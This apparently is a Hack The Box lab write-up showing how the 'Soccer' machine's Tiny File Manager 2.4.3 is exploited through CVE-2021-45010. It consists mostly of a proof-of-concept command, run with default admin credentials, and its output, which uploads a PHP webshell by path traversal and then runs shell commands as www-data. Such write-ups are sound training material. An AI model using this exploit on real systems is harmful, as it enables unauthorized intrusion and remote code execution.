InfoSec LAB

Soccer_Exploitation

Created: 2 min read

Remote Code Execution

The target instance of Tiny File Manager has been confirmed to be vulnerable to [[Soccer_CVE-2021-45010#[CVE-2021-45010](https //nvd.nist.gov/vuln/detail/CVE-2021-45010)|CVE-2021-45010]].

┌──(kali㉿kali)-[~/archive/htb/labs/soccer]
└─$ python3 cve-2021-45010/src/cve_2021_45010/main.py -u http://soccer.htb/tiny/ -l admin -p 'admin@123' -g tiny/uploads -r uploads/
 
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗  ██╗      ██╗  ██╗███████╗ ██████╗  ██╗ ██████╗ 
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗███║      ██║  ██║██╔════╝██╔═████╗███║██╔═████╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝╚██║█████╗███████║███████╗██║██╔██║╚██║██║██╔██║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ██║╚════╝╚════██║╚════██║████╔╝██║ ██║████╔╝██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗ ██║           ██║███████║╚██████╔╝ ██║╚██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝           ╚═╝╚══════╝ ╚═════╝  ╚═╝ ╚═════╝ 
                                                                                                      
PoC for CVE-2021-45010 - Tiny File Manager Version < 2.4.7
 
[*] attempting login:
        [*] url      : http://soccer.htb/tiny/
        [*] username : admin
        [*] password : admin@123
[+] session cookie 🍪: qoke068230rkao38u7rii75s8s
[+] Login Success!
[+] vulnerable version detected: 2.4.3
[*] Attempting to Leak Web Root...
        [+] got web root: /var/www/html/tiny
[*] attempting webshell upload:
[*] filename : sbdizlqpdf.php
[*] gui path  : tiny/uploads
[*] Filesystem Path  ../../../../../../../../../../../var/www/html/tiny/uploads/sbdizlqpdf.php
[+] Webshell Uploaded!
[*] starting webshell at: http://soccer.htb/tiny/uploads/sbdizlqpdf.php
        [+] info: Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
        [+] user: uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
Type quit to exit
 
$> whoami
www-data
 
$> hostname
soccer
 
$> ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.194  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:2727  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:2727  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:27:27  txqueuelen 1000  (Ethernet)
        RX packets 3083803  bytes 536738270 (536.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3114169  bytes 1170752055 (1.1 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 469  bytes 37010 (37.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 469  bytes 37010 (37.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the www-data account via exploit CVE-2021-45010

Interactive Graph View

Backlinks